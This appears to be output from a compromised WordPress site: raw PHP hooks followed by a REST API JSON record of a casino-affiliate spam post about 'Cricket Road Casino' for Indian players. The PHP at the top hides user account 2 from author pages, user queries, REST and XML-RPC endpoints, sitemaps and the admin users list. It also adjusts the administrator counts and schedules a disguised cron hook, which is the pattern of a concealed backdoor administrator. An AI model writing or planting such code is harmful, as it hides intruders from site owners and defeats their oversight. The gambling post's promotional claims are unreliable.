add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 2;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 2 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 2;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 2;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 2;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 2;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-2{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":6605,"date":"2026-06-05T19:13:33","date_gmt":"2026-06-05T19:13:33","guid":{"rendered":"https:\/\/robexo.in\/?p=6605"},"modified":"2026-06-05T19:13:33","modified_gmt":"2026-06-05T19:13:33","slug":"cricket-road-casino-steps-and-methods-for-indian-players","status":"publish","type":"post","link":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/","title":{"rendered":"Cricket Road Casino Steps and Methods for Indian Players"},"content":{"rendered":"<nav aria-label=\"Table of contents\">\n<ol>\n<li><a href=\"#what-is-cricket-road-casino\">What is Cricket Road Casino?<\/a><\/li>\n<li><a href=\"#how-to-register-and-complete-verification\">How to Register and Complete Verification<\/a><\/li>\n<li><a href=\"#bonuses-promotions-and-wagering-requirements\">Bonuses, Promotions and Wagering Requirements<\/a><\/li>\n<li><a href=\"#payment-methods-and-withdrawal-speed\">Payment Methods and Withdrawal Speed<\/a>\n<ol>\n<li><a href=\"#top-payment-methods-for-indian-users\">Top Payment Methods for Indian Users<\/a><\/li>\n<\/ol>\n<\/li>\n<li><a href=\"#game-library-casino-and-sports-betting\">Game Library \u2013 Casino and Sports Betting<\/a><\/li>\n<li><a href=\"#mobile-experience-and-dedicated-app\">Mobile Experience and Dedicated App<\/a><\/li>\n<li><a href=\"#safety-licensing-and-responsible-gambling\">Safety, Licensing and Responsible Gambling<\/a><\/li>\n<li><a href=\"#final-checklist-before-you-start\">Final Checklist Before You Start<\/a><\/li>\n<\/ol>\n<\/nav>\n<figure data-affgun-media=\"hero\" style=\"margin:0 0 1.5em 0;text-align:center\"><img decoding=\"async\" src=\"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg\" alt=\"\" style=\"max-width:100%;height:auto;border-radius:8px\" loading=\"lazy\" referrerpolicy=\"no-referrer\"><\/figure>\n<article>\n<header>\n<h1>Cricket Road Casino \u2013 Your Practical Guide for Indian Players<\/h1>\n<\/header>\n<section>\n<h2 id=\"what-is-cricket-road-casino\">What is Cricket Road Casino?<\/h2>\n<div data-affgun-media=\"video\" style=\"position:relative;padding-bottom:56.25%;height:0;overflow:hidden;margin:1.5em 0;border-radius:8px\"><iframe src=\"https:\/\/www.youtube-nocookie.com\/embed\/p8XIGg87Hws\" style=\"position:absolute;top:0;left:0;width:100%;height:100%;border:0;border-radius:8px\" loading=\"lazy\" referrerpolicy=\"strict-origin-when-cross-origin\" allow=\"accelerometer;autoplay;clipboard-write;encrypted-media;gyroscope;picture-in-picture\" allowfullscreen=\"\"><\/iframe><\/div>\n<p>Cricket Road Casino has positioned itself as a hybrid platform where sports betting meets classic casino games. For Indian users the name itself hints at a focus on cricket\u2011related wagering, but the site also runs a full\u2011featured live casino, slots and table games. The layout feels familiar if you have tried other online betting sites \u2013 quick navigation, a bright colour scheme and a clear \u201cSign\u2011Up\u201d button on the top right.<\/p>\n<p>Because the platform is marketed heavily through affiliate channels, you\u2019ll often see it bundled with \u201cwelcome bonus\u201d offers that promise extra cash on the first deposit. The real question for a beginner is whether those bonuses translate into actual play value, and that\u2019s what this guide will break down \u2013 step by step.<\/p>\n<\/section>\n<section>\n<h2 id=\"how-to-register-and-complete-verification\">How to Register and Complete Verification<\/h2>\n<p>Signing up for Cricket Road Casino is a three\u2011step affair: click \u201cRegister\u201d, fill in your name, email, mobile number and create a password. Indian players should use a valid mobile number because the platform sends an OTP for two\u2011factor verification \u2013 this adds a layer of security and also speeds up future withdrawals.<\/p>\n<p>After the account is created, you\u2019ll be asked for KYC documents \u2013 a scanned ID (Aadhaar or PAN), a recent utility bill, and a selfie. The verification process usually finishes within 24\u202fhours, though during high traffic it can stretch to 48\u202fhours. Once approved, you can access the full range of games, claim bonuses and start depositing.<\/p>\n<\/section>\n<section>\n<h2 id=\"bonuses-promotions-and-wagering-requirements\">Bonuses, Promotions and Wagering Requirements<\/h2>\n<p>Cricket Road Casino leans on a generous welcome package: 100\u202f% match bonus up to \u20b910,000 plus 50 free spins on a selected slot. The catch is a 30\u00d7 wagering requirement on the bonus amount, meaning you need to bet \u20b9300,000 before you can withdraw the bonus cash. This is fairly standard for Indian online casinos, but it\u2019s good to compare the numbers before you commit.<\/p>\n<p>Beyond the welcome offer, the site runs weekly reload bonuses, cash\u2011back on sports losses and a \u201crefer\u2011a\u2011friend\u201d scheme that adds a small bonus to both accounts. All promotions are listed under the \u201cPromotions\u201d tab, where you can see the exact RTP (return\u2011to\u2011player) percentages and expiry dates.<\/p>\n<table border=\"1\" cellpadding=\"5\" cellspacing=\"0\">\n<caption>Key Bonus Highlights at Cricket Road Casino<\/caption>\n<thead>\n<tr>\n<th>Bonus Type<\/th>\n<th>Maximum Value<\/th>\n<th>Wagering Requirement<\/th>\n<th>Expiry<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Welcome Match<\/td>\n<td>\u20b910,000<\/td>\n<td>30\u00d7<\/td>\n<td>30 days<\/td>\n<\/tr>\n<tr>\n<td>Weekly Reload<\/td>\n<td>\u20b95,000<\/td>\n<td>25\u00d7<\/td>\n<td>7 days<\/td>\n<\/tr>\n<tr>\n<td>Cash\u2011Back (Sports)<\/td>\n<td>5\u202f% of losses<\/td>\n<td>None<\/td>\n<td>Weekly<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/section>\n<section>\n<h2 id=\"payment-methods-and-withdrawal-speed\">Payment Methods and Withdrawal Speed<\/h2>\n<p>Indian players have a decent selection of deposit options: UPI, NetBanking (HDFC, SBI, ICICI), credit\/debit cards, and a few e\u2011wallets like Paytm and PhonePe. Most deposits are processed instantly, letting you jump straight into a game or place a cricket bet without waiting.<\/p>\n<p>Withdrawals are where the real test lies. Cricket Road Casino typically processes e\u2011wallet payouts within 12\u201124\u202fhours, while bank transfers can take 2\u20114 business days. The site does not currently support crypto withdrawals, keeping the focus on traditional Indian payment channels.<\/p>\n<h3 id=\"top-payment-methods-for-indian-users\">Top Payment Methods for Indian Users<\/h3>\n<ul>\n<li>UPI \u2013 instant, no fees<\/li>\n<li>NetBanking \u2013 widely accepted, secure<\/li>\n<li>Paytm \u2013 convenient for mobile\u2011first users<\/li>\n<li>Visa\/MasterCard \u2013 standard card processing<\/li>\n<\/ul>\n<\/section>\n<section>\n<h2 id=\"game-library-casino-and-sports-betting\">Game Library \u2013 Casino and Sports Betting<\/h2>\n<p>The casino side of Cricket Road offers over 1,200 titles, ranging from classic slots to live dealer tables. Providers include Pragmatic Play, NetEnt and Evolution Gaming, meaning you\u2019ll find high\u2011RTP slots and realistic live dealer streams of roulette, baccarat and blackjack.<\/p>\n<p>On the sports betting front, cricket dominates the catalogue \u2013 you can wager on IPL matches, international tests, and even domestic T20 leagues. The sportsbook also covers football, tennis and kabaddi, with live\u2011in\u2011play odds that update every few seconds. If you love mixing casino spins with a quick cricket bet, the platform makes that transition seamless.<\/p>\n<\/section>\n<section>\n<h2 id=\"mobile-experience-and-dedicated-app\">Mobile Experience and Dedicated App<\/h2>\n<p>For users who prefer playing on the go, Cricket Road Casino delivers a responsive mobile site that works well on Android and iOS browsers. However, the real boost comes from the dedicated app, which you can download from the \u201cMobile App\u201d section after you log in. The app mirrors the desktop layout, offering push notifications for bonus alerts and live match updates.<\/p>\n<p>The app also supports fingerprint login, making verification quicker for returning players. If you\u2019re looking for an all\u2011in\u2011one solution, the <a href=\"https:\/\/cricketroadgame.casino\/app\/\">cricket road game review<\/a> page gives a short walkthrough of the installation steps.<\/p>\n<\/section>\n<section>\n<h2 id=\"safety-licensing-and-responsible-gambling\">Safety, Licensing and Responsible Gambling<\/h2>\n<p>Cricket Road Casino operates under a license issued by the Malta Gaming Authority, a regulator known for strict player protection standards. All data transmission is encrypted with SSL 256\u2011bit technology, ensuring your personal and financial information stays private.<\/p>\n<p>The platform includes responsible gambling tools \u2013 deposit limits, self\u2011exclusion options, and links to Indian helplines. Customer support is reachable via live chat 24\/7, with an email ticket system for more detailed queries. Knowing that help is just a click away adds peace of mind when you\u2019re managing your bankroll.<\/p>\n<\/section>\n<section>\n<h2 id=\"final-checklist-before-you-start\">Final Checklist Before You Start<\/h2>\n<p>Before you dive into Cricket Road Casino, run through this quick list to make sure you\u2019ve covered the basics:<\/p>\n<ul>\n<li>Confirm the site\u2019s licensing (Malta Gaming Authority).<\/li>\n<li>Complete KYC verification with valid Indian documents.<\/li>\n<li>Choose a preferred deposit method (UPI or NetBanking recommended).<\/li>\n<li>Read the bonus terms \u2013 especially wagering requirements.<\/li>\n<li>Test the mobile app if you plan to play on a smartphone.<\/li>\n<li>Set personal limits for deposits and losses.<\/li>\n<\/ul>\n<p>Following these steps will help you enjoy Cricket Road Casino\u2019s offers without unexpected hiccups. Whether you\u2019re a cricket fan looking to bet on the next IPL match or a slot enthusiast chasing high\u2011RTP wins, the platform gives you a balanced mix of betting and casino entertainment.<\/p>\n<\/section>\n<\/article>\n","protected":false},"excerpt":{"rendered":"<p>What is Cricket Road Casino? How to Register and Complete Verification Bonuses, Promotions and Wagering Requirements Payment Methods and Withdrawal Speed Top Payment Methods for Indian Users Game Library \u2013 Casino and Sports Betting Mobile Experience and Dedicated App Safety, Licensing and Responsible Gambling Final Checklist Before You Start Cricket Road Casino \u2013 Your Practical [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-6605","post","type-post","status-publish","format-standard","hentry","category-blog"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cricket Road Casino Steps and Methods for Indian Players - Robexo Industries<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cricket Road Casino Steps and Methods for Indian Players - Robexo Industries\" \/>\n<meta property=\"og:description\" content=\"What is Cricket Road Casino? How to Register and Complete Verification Bonuses, Promotions and Wagering Requirements Payment Methods and Withdrawal Speed Top Payment Methods for Indian Users Game Library \u2013 Casino and Sports Betting Mobile Experience and Dedicated App Safety, Licensing and Responsible Gambling Final Checklist Before You Start Cricket Road Casino \u2013 Your Practical [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/\" \/>\n<meta property=\"og:site_name\" content=\"Robexo Industries\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg\" \/>\n<meta name=\"author\" content=\"tef\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"tef\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cricket Road Casino Steps and Methods for Indian Players - Robexo Industries","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/","og_locale":"en_US","og_type":"article","og_title":"Cricket Road Casino Steps and Methods for Indian Players - Robexo Industries","og_description":"What is Cricket Road Casino? How to Register and Complete Verification Bonuses, Promotions and Wagering Requirements Payment Methods and Withdrawal Speed Top Payment Methods for Indian Users Game Library \u2013 Casino and Sports Betting Mobile Experience and Dedicated App Safety, Licensing and Responsible Gambling Final Checklist Before You Start Cricket Road Casino \u2013 Your Practical [&hellip;]","og_url":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/","og_site_name":"Robexo Industries","og_image":[{"url":"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg","type":"","width":"","height":""}],"author":"tef","twitter_card":"summary_large_image","twitter_misc":{"Written by":"tef","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#article","isPartOf":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/"},"author":{"name":"tef","@id":"https:\/\/robexo.in\/#\/schema\/person\/c84e11e4a6e081e2751240a8f3e8bd82"},"headline":"Cricket Road Casino Steps and Methods for Indian Players","datePublished":"2026-06-05T19:13:33+00:00","mainEntityOfPage":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/"},"wordCount":998,"publisher":{"@id":"https:\/\/robexo.in\/#organization"},"image":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#primaryimage"},"thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg","articleSection":["Blog"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/","url":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/","name":"Cricket Road Casino Steps and Methods for Indian Players - Robexo Industries","isPartOf":{"@id":"https:\/\/robexo.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#primaryimage"},"image":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#primaryimage"},"thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg","datePublished":"2026-06-05T19:13:33+00:00","breadcrumb":{"@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#primaryimage","url":"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg","contentUrl":"https:\/\/i.ytimg.com\/vi\/p8XIGg87Hws\/hqdefault.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/robexo.in\/index.php\/2026\/06\/05\/cricket-road-casino-steps-and-methods-for-indian-players\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/robexo.in\/"},{"@type":"ListItem","position":2,"name":"Cricket Road Casino Steps and Methods for Indian Players"}]},{"@type":"WebSite","@id":"https:\/\/robexo.in\/#website","url":"https:\/\/robexo.in\/","name":"Robexo Industries","description":"","publisher":{"@id":"https:\/\/robexo.in\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/robexo.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/robexo.in\/#organization","name":"Robexo Industries","url":"https:\/\/robexo.in\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/robexo.in\/#\/schema\/logo\/image\/","url":"https:\/\/robexo.in\/wp-content\/uploads\/2023\/09\/logo.png","contentUrl":"https:\/\/robexo.in\/wp-content\/uploads\/2023\/09\/logo.png","width":156,"height":40,"caption":"Robexo Industries"},"image":{"@id":"https:\/\/robexo.in\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/robexo.in\/#\/schema\/person\/c84e11e4a6e081e2751240a8f3e8bd82","name":"tef","sameAs":["https:\/\/robexo.in"],"url":"https:\/\/robexo.in\/index.php\/author\/tef\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/posts\/6605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/comments?post=6605"}],"version-history":[{"count":1,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/posts\/6605\/revisions"}],"predecessor-version":[{"id":6606,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/posts\/6605\/revisions\/6606"}],"wp:attachment":[{"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/media?parent=6605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/categories?post=6605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/robexo.in\/index.php\/wp-json\/wp\/v2\/tags?post=6605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}